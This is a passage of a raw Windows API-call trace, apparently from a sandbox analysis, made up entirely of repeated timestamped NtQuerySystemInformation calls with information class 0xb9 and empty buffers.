(SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.054] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.054] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.054] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.054] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.055] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.055] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.055] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.055] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.055] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.059] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.059] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.070] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.070] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.078] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.078] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.078] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.078] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.078] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.078] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.078] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.078] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.078] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.079] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.079] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.079] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.079] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.079] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.080] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.080] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.080] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.080] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.083] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.083] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.969] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.969] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.969] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.969] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.988] 